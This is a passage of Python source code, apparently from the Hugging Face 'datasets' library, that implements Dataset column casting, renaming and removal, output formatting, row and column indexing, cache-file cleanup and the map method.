any(isinstance(field.type, pa.StructType) for field in self._data.schema):\n self._data = self._data.flatten()\n else:\n break\n if self.info is not None:\n self.info.features = Features.from_arrow_schema(self._data.schema)\n logger.info(\n \"Flattened dataset from depth {} to depth {}.\".format(depth, 1 if depth + 1 < max_depth else \"unknown\")\n )\n\n @fingerprint(inplace=True)\n def cast_(self, features: Features):\n \"\"\"\n Cast the dataset to a new set of features.\n\n You can also remove a column using :func:`Dataset.map` with `feature` but :func:`cast_`\n is in-place (doesn't copy the data to a new dataset) and is thus faster.\n\n Args:\n features (:class:`datasets.Features`): New features to cast the dataset to.\n The name and order of the fields in the features must match the current column names.\n The type of the data must also be convertible from one type to the other.\n For non-trivial conversion, e.g. string <-> ClassLabel you should use :func:`map` to update the Dataset.\n \"\"\"\n if list(features) != self._data.column_names:\n raise ValueError(\n f\"The columns in features ({list(features)}) must be identical and in the same order \"\n f\"as the columns in the dataset: {self._data.column_names}\"\n )\n\n self._info.features = features\n schema = pa.schema(features.type)\n self._data = self._data.cast(schema)\n\n @fingerprint(inplace=True)\n def remove_columns_(self, column_names: Union[str, List[str]]):\n \"\"\"\n Remove one or several column(s) in the dataset and\n the features associated to them.\n\n You can also remove a column using :func:`Dataset.map` with `remove_columns` but the present method\n is in-place (doesn't copy the data to a new dataset) and is thus faster.\n\n Args:\n column_names (:obj:`Union[str, List[str]]`): Name of the column(s) to remove.\n \"\"\"\n if isinstance(column_names, str):\n column_names = [column_names]\n\n for column_name in column_names:\n if column_name not in self._data.column_names:\n raise ValueError(\n f\"Column name {column_name} not in the dataset. \"\n f\"Current columns in the dataset: {self._data.column_names}\"\n )\n\n for column_name in column_names:\n del self._info.features[column_name]\n\n self._data = self._data.drop(column_names)\n\n @fingerprint(inplace=True)\n def rename_column_(self, original_column_name: str, new_column_name: str):\n \"\"\"\n Rename a column in the dataset and move the features associated to the original column under the new column name.\n\n You can also rename a column using :func:`Dataset.map` with `remove_columns` but the present method:\n - takes care of moving the original features under the new column name.\n - doesn't copy the data to a new dataset and is thus much faster.\n\n Args:\n original_column_name (:obj:`str`): Name of the column to rename.\n new_column_name (:obj:`str`): New name for the column.\n \"\"\"\n if original_column_name not in self._data.column_names:\n raise ValueError(\n f\"Original column name {original_column_name} not in the dataset. \"\n f\"Current columns in the dataset: {self._data.column_names}\"\n )\n if new_column_name in self._data.column_names:\n raise ValueError(\n f\"New column name {original_column_name} already in the dataset. \"\n f\"Please choose a column name which is not already in the dataset. \"\n f\"Current columns in the dataset: {self._data.column_names}\"\n )\n if not new_column_name:\n raise ValueError(\"New column name is empty.\")\n\n new_column_names = [new_column_name if col == original_column_name else col for col in self._data.column_names]\n\n self._info.features[new_column_name] = self._info.features[original_column_name]\n del self._info.features[original_column_name]\n\n self._data = self._data.rename_columns(new_column_names)\n\n def __len__(self):\n \"\"\" Number of rows in the dataset \"\"\"\n return self.num_rows\n\n def __iter__(self):\n \"\"\"Iterate through the examples.\n If a formatting is set with :func:`datasets.Dataset.set_format` rows will be returned with the\n selected format.\n \"\"\"\n format_type = self._format_type\n format_kwargs = self._format_kwargs\n format_columns = self._format_columns\n output_all_columns = self._output_all_columns\n for index in range(self.num_rows):\n yield self._getitem(\n index,\n format_type=format_type,\n format_columns=format_columns,\n output_all_columns=output_all_columns,\n format_kwargs=format_kwargs,\n )\n\n def __repr__(self):\n return f\"Dataset(features: {self.features}, num_rows: {self.num_rows})\"\n\n @property\n def format(self):\n return {\n \"type\": self._format_type,\n \"format_kwargs\": self._format_kwargs,\n \"columns\": self.column_names if self._format_columns is None else self._format_columns,\n \"output_all_columns\": self._output_all_columns,\n }\n\n @contextlib.contextmanager\n def formatted_as(\n self,\n type: Optional[str] = None,\n columns: Optional[List] = None,\n output_all_columns: bool = False,\n **format_kwargs,\n ):\n \"\"\"To be used in a `with` statement. Set __getitem__ return format (type and columns)\n\n Args:\n type (Optional ``str``): output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas']\n None means __getitem__ returns python objects (default)\n columns (Optional ``List[str]``): columns to format in the output\n None means __getitem__ returns all columns (default)\n output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects)\n format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`.\n \"\"\"\n old_format_type = self._format_type\n old_format_kwargs = self._format_kwargs\n old_format_columns = self._format_columns\n old_output_all_columns = self._output_all_columns\n try:\n self.set_format(type, columns, output_all_columns, **format_kwargs)\n yield\n finally:\n self.set_format(old_format_type, old_format_columns, old_output_all_columns, **old_format_kwargs)\n\n @fingerprint(inplace=True)\n def set_format(\n self,\n type: Optional[str] = None,\n columns: Optional[List] = None,\n output_all_columns: bool = False,\n **format_kwargs,\n ):\n \"\"\"Set __getitem__ return format (type and columns)\n\n Args:\n type (Optional ``str``): output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas']\n None means __getitem__ returns python objects (default)\n columns (Optional ``List[str]``): columns to format in the output\n None means __getitem__ returns all columns (default)\n output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects)\n format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`.\n \"\"\"\n # Check return type\n if type in [\"torch\", \"pytorch\", \"pt\"]:\n try:\n import torch # noqa: F401\n except ImportError:\n logger.error(\"PyTorch needs to be installed to be able to return PyTorch tensors.\")\n type = \"torch\"\n elif type in [\"tensorflow\", \"tf\"]:\n try:\n import tensorflow # noqa: F401\n except ImportError:\n logger.error(\"Tensorflow needs to be installed to be able to return Tensorflow tensors.\")\n type = \"tensorflow\"\n elif type in [\"numpy\", \"np\"]:\n type = \"numpy\"\n elif type in [\"pandas\", \"pd\"]:\n type = \"pandas\"\n elif type in [None, \"python\"]:\n type = None\n else:\n assert not (\n type == \"pandas\" and (output_all_columns or format_kwargs)\n ), \"Format type 'pandas' doesn't allow the use of `output_all_columns` or `**format_kwargs`.\"\n assert (\n type is None or type == \"numpy\" or type == \"pandas\"\n ), \"Return type should be None or selected in ['numpy', 'torch', 'tensorflow', 'pandas'], but got '{}'\".format(\n type\n )\n\n # Check filter column\n if isinstance(columns, str):\n columns = [columns]\n if columns is not None and any(col not in self._data.column_names for col in columns):\n raise ValueError(\n \"Columns {} not in the dataset. Current columns in the dataset: {}\".format(\n list(filter(lambda col: col not in self._data.column_names, columns)), self._data.column_names\n )\n )\n\n format_kwargs.update(format_kwargs.pop(\"format_kwargs\", {})) # allow to use self.set_format(self.format)\n self._format_type = type\n self._format_kwargs = format_kwargs\n self._format_columns = columns\n self._output_all_columns = output_all_columns\n logger.info(\n \"Set __getitem__(key) output type to %s for %s columns \"\n \" (when key is int or slice) and %s output other (un-formatted) columns.\",\n \"python objects\" if type is None else type,\n \"no\" if columns is None else str(columns),\n \"do\" if output_all_columns else \"don't\",\n )\n\n def reset_format(self):\n \"\"\"Reset __getitem__ return format to python objects and all columns.\n\n Same as ``self.set_format()``\n \"\"\"\n self.set_format()\n\n def _convert_outputs(\n self, outputs, format_type=None, format_columns=None, output_all_columns=False, format_kwargs=None\n ):\n format_kwargs = format_kwargs if format_kwargs is not None else {}\n if format_type is None:\n if output_all_columns:\n return outputs\n if isinstance(outputs, dict) and format_columns is not None:\n return {k: v for k, v in outputs.items() if k in format_columns}\n return outputs\n\n map_nested_kwargs = {}\n if format_type == \"numpy\":\n if \"copy\" not in format_kwargs:\n format_kwargs[\"copy\"] = False\n command = partial(np.array, **format_kwargs)\n map_nested_kwargs[\"map_list\"] = False # convert lists to arrays\n elif format_type == \"torch\":\n import torch\n\n map_nested_kwargs[\"map_list\"] = False # convert lists to tensors\n\n def command(x):\n if isinstance(\n x, (list, tuple, np.ndarray)\n ): # add support for nested types like struct of list of struct\n x = np.array(x, copy=False)\n if x.dtype == np.object: # pytorch tensors cannot be instantied from an array of objects\n return [map_nested(command, i, **map_nested_kwargs) for i in x]\n return torch.tensor(x, **format_kwargs)\n\n elif format_type == \"tensorflow\":\n import tensorflow\n\n map_nested_kwargs[\"map_list\"] = False # convert lists to tensors\n\n def command(x):\n if isinstance(\n x, (list, tuple, np.ndarray)\n ): # add support for nested types like struct of list of struct\n x = np.array(x, copy=False)\n if x.dtype == np.object: # tensorflow tensors can sometimes be instantied from an array of objects\n try:\n return tensorflow.ragged.constant(x, **format_kwargs)\n except ValueError:\n return [map_nested(command, i, **map_nested_kwargs) for i in x]\n return tensorflow.ragged.constant(x, **format_kwargs)\n\n else:\n\n def identity(x):\n return x\n\n command = identity\n if isinstance(outputs, (list, tuple, np.ndarray, pd.Series)):\n return command(outputs)\n elif isinstance(outputs, pd.DataFrame):\n if format_columns is not None and not output_all_columns:\n to_remove_columns = [col for col in self.column_names if col not in format_columns]\n output_dict = outputs.drop(to_remove_columns, axis=1)\n else:\n output_dict = outputs\n else:\n output_dict = {}\n for k, v in outputs.items():\n if format_columns is not None and k not in format_columns and not output_all_columns:\n continue\n if format_columns is None or k in format_columns:\n v = map_nested(command, v, **map_nested_kwargs)\n output_dict[k] = v\n return output_dict\n\n @staticmethod\n def _unnest(py_dict):\n return dict((key, array[0]) for key, array in py_dict.items())\n\n @staticmethod\n def _nest(py_dict):\n return dict((key, [elem]) for key, elem in py_dict.items())\n\n def _map_indices(self, indices: Union[int, slice, pa.Array, Iterable]):\n if self._indices is None:\n return indices\n\n if isinstance(indices, int):\n return self._indices.column(0)[indices].as_py()\n\n slice_indices = None\n array_indices = None\n if isinstance(indices, slice):\n slice_indices = indices.indices(self.num_rows)\n # Check if the slice is a contiguous slice - else build an indices array\n if slice_indices[2] != 1 or slice_indices[1] < slice_indices[0]:\n array_indices = pa.array(list(range(*slice_indices)), type=pa.uint64())\n elif isinstance(indices, pa.Array):\n array_indices = indices\n elif isinstance(indices, Iterable):\n array_indices = pa.array([int(i) for i in indices], type=pa.uint64())\n\n # We can do a slice\n if array_indices is None:\n return self._indices.column(0).slice(slice_indices[0], slice_indices[1] - slice_indices[0])\n\n # We cannot do a slice, we need to do a take or some concatenation on pyarrow < 1.0.0\n if PYARROW_V0: # pre-1.0.0 backward compatibility\n data_array = pa.concat_tables(self._indices.slice(i.as_py(), 1) for i in array_indices).column(0)\n else:\n data_array = self._indices.column(0).take(array_indices)\n\n return data_array\n\n def _getitem(\n self,\n key: Union[int, slice, str],\n format_type=None,\n format_columns=None,\n output_all_columns=False,\n format_kwargs=None,\n ) -> Union[Dict, List]:\n \"\"\"\n Can be used to index columns (by string names) or rows (by integer index, slices, or iter of indices or bools)\n \"\"\"\n # In the following, to convert data from the arrow table to dicts or lists,\n # we use .to_pandas().to_dict() or .to_pandas().to_list() as they are\n # significantly faster than .to_pydict() thanks to zero-copy and because it doesn't\n # call `list()` on every object in sequences of sequences of objects for example\n if isinstance(key, int):\n if key < 0:\n key = self.num_rows + key\n if key >= self.num_rows or key < 0:\n raise IndexError(f\"Index ({key}) outside of table length ({self.num_rows}).\")\n\n # Check if we need to convert indices\n key = self._map_indices(key)\n\n if format_type is not None:\n if format_type == \"pandas\":\n outputs = self._data.slice(key, 1).to_pandas(types_mapper=pandas_types_mapper)\n else:\n outputs = self._unnest(\n self._data.slice(key, 1).to_pandas(types_mapper=pandas_types_mapper).to_dict(\"list\")\n )\n else:\n outputs = self._unnest(self._data.slice(key, 1).to_pydict())\n\n elif isinstance(key, slice):\n indices_array = None\n key_indices = key.indices(self.num_rows)\n\n # Check if the slice is a contiguous slice - else build an indices array\n if key_indices[2] != 1 or key_indices[1] < key_indices[0]:\n indices_array = pa.array(list(range(*key)), type=pa.uint64())\n\n # Check if we need to convert indices\n if self._indices is not None:\n indices_array = self._map_indices(indices_array if indices_array else key)\n # TODO: here we could add a check that the resulting indices are a contiguous slice\n # to avoid using 'take' instead of 'slice'\n\n # Get the subset of the table\n if indices_array is not None:\n # if PYARROW_V0: # don't use take (see https://issues.apache.org/jira/browse/ARROW-9773)\n data_subset = pa.concat_tables(\n self._data.slice(indices_array[i].as_py(), 1) for i in range(len(indices_array))\n )\n # else:\n # data_subset = self._data.take(indices_array)\n else:\n data_subset = self._data.slice(key_indices[0], key_indices[1] - key_indices[0])\n\n # Convert to the format\n if format_type is not None:\n if format_type == \"pandas\":\n outputs = data_subset.to_pandas(types_mapper=pandas_types_mapper)\n else:\n outputs = data_subset.to_pandas(types_mapper=pandas_types_mapper).to_dict(\"list\")\n else:\n outputs = data_subset.to_pydict()\n\n elif isinstance(key, str):\n if key not in self._data.column_names:\n raise ValueError(f\"Column ({key}) not in table columns ({self._data.column_names}).\")\n\n # Check if we need to convert indices\n if self._indices is not None:\n indices_array = self._indices.column(0)\n # if PYARROW_V0: # don't use take (see https://issues.apache.org/jira/browse/ARROW-9773)\n data_array = pa.concat_tables(self._data.slice(i.as_py(), 1) for i in indices_array).column(key)\n # else:\n # data_array = self._data.column(key).take(indices_array)\n else:\n data_array = self._data.column(key)\n\n if format_type is not None:\n # We should use\n # outputs = self._data[key].to_pandas(types_mapper=pandas_types_mapper)\n # but there is a bug in pyarrow that makes ignores the types_mapper in that case\n # see https://issues.apache.org/jira/browse/ARROW-9664\n # We build a table with one column and call to_pandas on it instead\n one_column_table = pa.Table.from_arrays([data_array], schema=pa.schema([self._data.schema.field(key)]))\n if format_columns is None or key in format_columns:\n if format_type == \"pandas\":\n outputs = one_column_table.to_pandas(types_mapper=pandas_types_mapper)[key]\n else:\n outputs = one_column_table.to_pandas(types_mapper=pandas_types_mapper)[key].to_list()\n else:\n outputs = one_column_table.to_pandas(types_mapper=pandas_types_mapper)[key].to_list()\n else:\n outputs = data_array.to_pylist()\n\n elif isinstance(key, Iterable):\n if len(key) > 0 and isinstance(key[0], (bool, np.bool_)):\n if len(key) != self.__len__():\n raise ValueError(\n f\"Iterable with bool entries must be length of dataset ({self.__len__()}), \" f\"not {len(key)}\"\n )\n indices = [i for i, val in enumerate(key) if val]\n else:\n indices = key\n\n indices_array = pa.array([int(i) for i in indices], type=pa.uint64())\n\n # Check if we need to convert indices\n indices_array = self._map_indices(indices_array)\n\n # TODO: here we could add a check that the resulting indices are a contiguous slice\n # to avoid using 'take' instead of 'slice'\n\n # if PYARROW_V0: # don't use take (see https://issues.apache.org/jira/browse/ARROW-9773)\n data_subset = pa.concat_tables(\n self._data.slice(indices_array[i].as_py(), 1) for i in range(len(indices_array))\n )\n # else:\n # data_subset = self._data.take(indices_array)\n\n if format_type is not None:\n if format_type == \"pandas\":\n outputs = data_subset.to_pandas(types_mapper=pandas_types_mapper)\n else:\n outputs = data_subset.to_pandas(types_mapper=pandas_types_mapper).to_dict(\"list\")\n else:\n outputs = data_subset.to_pydict()\n\n else:\n raise ValueError(\"Can only get row(s) (int or slice or list[int]) or columns (string).\")\n\n if format_type is not None or format_columns is not None:\n outputs = self._convert_outputs(\n outputs,\n format_type=format_type,\n format_columns=format_columns,\n output_all_columns=output_all_columns,\n format_kwargs=format_kwargs,\n )\n return outputs\n\n def __getitem__(self, key: Union[int, slice, str]) -> Union[Dict, List]:\n \"\"\"\n Can be used to index columns (by string names) or rows (by integer index or iterable of indices or bools)\n \"\"\"\n return self._getitem(\n key,\n format_type=self._format_type,\n format_columns=self._format_columns,\n output_all_columns=self._output_all_columns,\n format_kwargs=self._format_kwargs,\n )\n\n def cleanup_cache_files(self):\n \"\"\"Clean up all cache files in the dataset cache directory, excepted the currently used cache file if there is one.\n Be carefull when running this command that no other process is currently using other cache files.\n\n Return:\n Number of removed files\n \"\"\"\n if not self._data_files or \"filename\" not in self._data_files[0]:\n return None\n current_cache_files = [os.path.abspath(cache_file[\"filename\"]) for cache_file in self._data_files]\n cache_directory = os.path.dirname(current_cache_files[0])\n logger.info(f\"Listing files in {cache_directory}\")\n files: List[str] = os.listdir(cache_directory)\n files_to_remove = []\n for f_name in files:\n full_name = os.path.abspath(os.path.join(cache_directory, f_name))\n if f_name.startswith(\"cache-\") and f_name.endswith(\".arrow\"):\n if full_name in current_cache_files:\n logger.info(f\"Keeping currently used cache file at {full_name}\")\n continue\n files_to_remove.append(full_name)\n for file_path in files_to_remove:\n logger.info(f\"Removing {file_path}\")\n os.remove(file_path)\n return len(files_to_remove)\n\n def _get_cache_file_path(self, fingerprint):\n cache_file_name = \"cache-\" + fingerprint + \".arrow\"\n cache_directory = os.path.dirname(self._data_files[0][\"filename\"])\n cache_file_path = os.path.join(cache_directory, cache_file_name)\n return cache_file_path\n\n def map(\n self,\n function: Optional[Callable] = None,\n with_indices: bool = False,\n input_columns: Optional[Union[str, List[str]]] = None,\n batched: bool = False,\n batch_size: Optional[int] = 1000,\n drop_last_batch: bool = False,\n remove_columns: Optional[List[str]] = None,\n keep_in_memory: bool = False,\n load_from_cache_file: bool = True,\n cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n features: Optional[Features] = None,\n disable_nullable: bool = False,\n fn_kwargs: Optional[dict] = None,\n num_proc: Optional[int] = None,\n suffix_template: str = \"_{rank:05d}_of_{num_proc:05d}\",\n new_fingerprint: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\"Apply a function to all the elements in the table (individually or in batches)\n and update the table (if function does updated examples).\n\n Args:\n function (`callable`): with one of the following signature:\n - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False`\n - `function(example: Union[Dict, Any], indices: int) -> Union[Dict, Any]` if `batched=False` and `with_indices=True`\n - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False`\n - `function(batch: Union[Dict[List], List[Any]], indices: List[int]) -> Union[Dict, Any]` if `batched=True` and `with_indices=True`\n If no function is provided, default to identity function: lambda x: x\n with_indices (`bool`, defaults to `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx): ...`.\n input_columns (`Optional[Union[str, List[str]]]`, defaults to `None`): The columns to be passed into `function` as\n positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument.\n batched (`bool`, defaults to `False`): Provide batch of examples to `function`\n batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to `function` if `batched=True`\n `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function`\n drop_last_batch (`bool`, default: `False`): Whether a last batch smaller than the batch_size should be\n dropped instead of being processed by the function.\n remove_columns (`Optional[List[str]]`, defaults to `None`): Remove a selection of columns while doing the mapping.\n Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding\n columns with names in `remove_columns`, these columns will be kept.\n keep_in_memory (`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file.\n load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the current computation from `function`\n can be identified, use it instead of recomputing.\n cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n results of the computation instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n features (`Optional[datasets.Features]`, defaults to `None`): Use a specific Features to store the cache file\n instead of the automatically generated one.\n disable_nullable (`bool`, defaults to `True`): Disallow null values in the table.\n fn_kwargs (`Optional[Dict]`, defaults to `None`): Keyword arguments to be passed to `function`\n num_proc (`Optional[int]`, defaults to `None`): Number of processes for multiprocessing. By default it doesn't\n use multiprocessing.\n suffix_template (`str`, defaults to \"_{rank:05d}_of_{num_proc:05d}\"): If cache_file_name is specified, then this suffix\n will be added at the end of the base name of each. For example, if cache_file_name is \"processed.arrow\", then for\n rank=1 and num_proc=4, the resulting file would be \"processed_00001_of_00004.arrow\" for the default suffix.\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n \"\"\"\n assert num_proc is None or num_proc > 0, \"num_proc must be an integer > 0.\"\n\n # If the array is empty we do nothing\n if len(self) == 0:\n return self\n\n if function is None:\n function = lambda x: x # noqa: E731\n\n if isinstance(input_columns, str):\n input_columns = [input_columns]\n\n if input_columns is not None:\n for input_column in input_columns:\n if input_column not in self._data.column_names:\n raise ValueError(\n \"Input column {} not in the dataset. Current columns in the dataset: {}\".format(\n input_column, self._data.column_names\n )\n )\n\n if fn_kwargs is None:\n fn_kwargs = dict()\n\n # Check if the function returns updated examples\n def does_function_return_dict(inputs, indices):\n \"\"\" Does the function returns a dict. \"\"\"\n fn_args = [inputs] if input_columns is None else [inputs[col] for col in input_columns]\n processed_inputs = (\n function(*fn_args, indices, **fn_kwargs) if with_indices else function(*fn_args, **fn_kwargs)\n )\n does_return_dict = isinstance(processed_inputs, Mapping)\n\n if does_return_dict is False and processed_inputs is not None:\n raise TypeError(\n \"Provided `function` which is applied to all elements of table returns a variable of type {}. Make sure provided `function` returns a variable of type `dict` to update the dataset or `None` if you are only interested in side effects.\".format(\n type(processed_inputs)\n )\n )\n elif isinstance(test_indices, list) and does_return_dict is True:\n allowed_batch_return_types = (list, np.ndarray)\n all_dict_values_are_lists = all(\n isinstance(value, allowed_batch_return_types) for value in processed_inputs.values()\n )\n if all_dict_values_are_lists is False:\n raise TypeError(\n \"Provided `function` which is applied to all elements of table returns a `dict` of types {}. When using `batched=True`, make sure provided `function` returns a `dict` of types like `{}`.\".format(\n [type(x) for x in processed_inputs.values()], allowed_batch_return_types\n )\n )\n\n return does_return_dict\n\n # We only update the data table (and use the cache) if the function returns a dict.\n # Test it on the first element or a small batch (0, 1) for batched inputs\n logger.info(\"Testing the mapped function outputs\")\n test_inputs = self[:2] if batched else self[0]\n test_indices = [0, 1] if batched else 0\n update_data = does_function_return_dict(test_inputs, test_indices)\n logger.info(\"Testing finished, running the mapping function on the dataset\")\n\n if num_proc is None or num_proc == 1:\n return self._map_single(\n function=function,\n with_indices=with_indices,\n input_columns=input_columns,\n batched=batched,\n batch_size=batch_size,\n drop_last_batch=drop_last_batch,\n remove_columns=remove_columns,\n keep_in_memory=keep_in_memory,\n load_from_cache_file=load_from_cache_file,\n cache_file_name=cache_file_name,\n writer_batch_size=writer_batch_size,\n features=features,\n disable_nullable=disable_nullable,\n fn_kwargs=fn_kwargs,\n new_fingerprint=new_fingerprint,\n update_data=update_data,\n )\n else:\n\n def format_cache_file_name(cache_file_name, rank):\n sep = cache_file_name.rindex(\".\")\n base_name, extension = cache_file_name[:sep], cache_file_name[sep:]\n cache_file_name = base_name + suffix_template.format(rank=rank, num_proc=num_proc) + extension\n logger.info(\"Process #{} will write at {}\".format(rank, cache_file_name))\n return cache_file_name\n\n with Pool(num_proc, initargs=(RLock(),), initializer=tqdm.set_lock) as pool:\n shards = [\n self.shard(num_shards=num_proc, index=rank, contiguous=True, keep_in_memory=keep_in_memory)\n for rank in range(num_proc)\n ]\n kwds_per_shard = [\n dict(\n self=shards[rank],\n function=function,\n with_indices=with_indices,\n input_columns=input_columns,\n batched=batched,\n batch_size=batch_size,\n drop_last_batch=drop_last_batch,\n remove_columns=remove_columns,\n keep_in_memory=keep_in_memory,\n load_from_cache_file=load_from_cache_file,\n cache_file_name=format_cache_file_name(cache_file_name, rank)\n if cache_file_name is not None\n else None,\n writer_batch_size=writer_batch_size,\n features=features.copy() if features is not None else None,\n disable_nullable=disable_nullable,\n fn_kwargs=fn_kwargs,\n rank=rank,\n offset=sum(len(s) for s in shards[:rank]),\n update_data=update_data,\n )\n for rank in range(num_proc)\n ]\n logger.info(\"Spawning {} processes\".format(num_proc))\n results = [pool.apply_async(self.__class__._map_single, kwds=kwds) for kwds in kwds_per_shard]\n transformed_shards = [r.get() for r in results]\n logger.info(\"Concatenating {} shards from multiprocessing\".format(num_proc))\n result = concatenate_datasets(transformed_shards)\n if new_fingerprint is not None:\n result._fingerprint = new_fingerprint\n return result\n\n @transmit_format\n @fingerprint(inplace=False)\n def _map_single(\n self,\n function: Optional[Callable] = None,\n with_indices: bool = False,\n input_columns: Optional[Union[str, List[str]]] = None,\n batched: bool = False,\n batch_size: Optional[int] = 1000,\n drop_last_batch: bool = False,\n remove_columns: Optional[List[str]] = None,\n keep_in_memory: bool = False,\n load_from_cache_file: bool = True,\n cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n features: Optional[Features] = None,\n disable_nullable: bool = False,\n fn_kwargs: Optional[dict] = None,\n new_fingerprint: Optional[str] = None,\n rank: Optional[int] = None,\n offset: int = 0,\n update_data=True,\n ) -> \"Dataset\":\n \"\"\"Apply a function to all the elements in the table (individually or in batches)\n and update the table (if function does updated examples).\n\n Args:\n function (`callable`): with one of the following signature:\n - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False`\n - `function(example: Union[Dict, Any], indices: int) -> Union[Dict, Any]` if `batched=False` and `with_indices=True`\n - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False`\n - `function(batch: Union[Dict[List], List[Any]], indices: List[int]) -> Union[Dict, Any]` if `batched=True` and `with_indices=True`\n If no function is provided, default to identity function: lambda x: x\n with_indices (`bool`, defaults to `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx): ...`.\n input_columns (`Optional[Union[str, List[str]]]`, defaults to `None`): The columns to be passed into `function` as\n positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument.\n batched (`bool`, defaults to `False`): Provide batch of examples to `function`\n batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to `function` if `batched=True`\n `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function`\n drop_last_batch (`bool`, default: `False`): Whether a last batch smaller than the batch_size should be\n dropped instead of being processed by the function.\n remove_columns (`Optional[List[str]]`, defaults to `None`): Remove a selection of columns while doing the mapping.\n Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding\n columns with names in `remove_columns`, these columns will be kept.\n keep_in_memory (`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file.\n load_from_cache_file (`bool`, defaults to `True`): If a cache file storing the current computation from `function`\n can be identified, use it instead of recomputing.\n cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n results of the computation instead of the automatically generated cache file name.\n writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n features (`Optional[datasets.Features]`, defaults to `None`): Use a specific Features to store the cache file\n instead of the automatically generated one.\n disable_nullable (`bool`, defaults to `True`): Disallow null values in the table.\n fn_kwargs (`Optional[Dict]`, defaults to `None`): Keyword arguments to be passed to `function`\n new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform.\n If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments\n rank: (`Optional[int]`, defaults to `None`): If specified, this is the process rank when doing multiprocessing\n offset: (`int`, defaults to 0): If specified, this is an offset applied to the indices passed to `function` if `with_indices=True`\n update_data (`bool`, defaults to `True`): If False, no new arrow table will be created\n \"\"\"\n assert (\n not keep_in_memory or cache_file_name is None\n ), \"Please use either `keep_in_memory` or `cache_file_name` but not both.\"\n\n not_verbose = bool(logger.getEffectiveLevel() > WARNING)\n\n # Reduce logging to keep things readable in multiprocessing with tqdm\n if rank is not None and get_verbosity() < WARNING:\n set_verbosity_warning()\n # Print at least one thing to fix tqdm in notebooks in multiprocessing\n # see https://github.com/tqdm/tqdm/issues/485#issuecomment-473338308\n if rank is not None and \"notebook\" in tqdm.__name__:\n print(\" \", end=\"\", flush=True)\n\n # Select the columns (arrow columns) to process\n if remove_columns is not None and any(col not in self._data.column_names for col in remove_columns):\n raise ValueError(\n \"Column to remove {} not in the dataset. Current columns in the dataset: {}\".format(\n list(filter(lambda col: col not in self._data.column_names, remove_columns)),\n self._data.column_names,\n )\n )\n\n if isinstance(input_columns, str):\n input_columns = [input_columns]\n\n if input_columns is not None:\n for input_column in input_columns:\n if input_column not in self._data.column_names:\n raise ValueError(\n \"Input column {} not in the dataset. Current columns in the dataset: {}\".format(\n input_column, self._data.column_names\n )\n )\n\n if fn_kwargs is None:\n fn_kwargs = dict()\n\n # If we do batch computation but no batch sze is provided, default to the full dataset\n if batched and (batch_size is None or batch_size <= 0):\n batch_size = self.num_rows\n\n class NumExamplesMismatch(Exception):\n pass\n\n def apply_function_on_filtered_inputs(inputs, indices, check_same_num_examples=False, offset=0):\n \"\"\" Utility to apply the function on a selection of columns. \"\"\"\n fn_args = [inputs] if input_columns is None else [inputs[col] for col in input_columns]\n if offset == 0:\n effective_indices = indices\n else:\n effective_indices = [i + offset for i in indices] if isinstance(indices, list) else indices + offset\n processed_inputs = (\n function(*fn_args, effective_indices, **fn_kwargs) if with_indices else function(*fn_args, **fn_kwargs)\n )\n if not update_data:\n return None # Nothing to update, let's move on\n if remove_columns is not None:\n for column in remove_columns:\n inputs.pop(column)\n if self._format_type is not None:\n inputs = self._getitem(\n key=(indices if isinstance(indices, int) else slice(indices[0], indices[-1] + 1)),\n format_type=None,\n format_columns=None,\n format_kwargs=None,\n )\n if check_same_num_examples:\n input_num_examples = len(inputs[next(iter(inputs.keys()))])\n processed_inputs_num_examples = len(processed_inputs[next(iter(processed_inputs.keys()))])\n if input_num_examples != processed_inputs_num_examples:\n raise NumExamplesMismatch()\n inputs.update(processed_inputs)\n return inputs\n\n # Check if we've already cached this computation (indexed by a hash)\n if update_data and self._data_files:\n if cache_file_name is None:\n # we create a unique hash from the function, current dataset file and the mapping args\n cache_file_name = self._get_cache_file_path(new_fingerprint)\n if os.path.exists(cache_file_name) and load_from_cache_file:\n logger.warning(\"Loading cached processed dataset at %s\", cache_file_name)\n info = self.info.copy()\n info.features = features\n return Dataset.from_file(cache_file_name, info=info, split=self.split)\n\n # Prepare output buffer and batched writer in memory or on file if we update the table\n if update_data:\n if features is None:\n features = self.features\n update_features = True\n else:\n 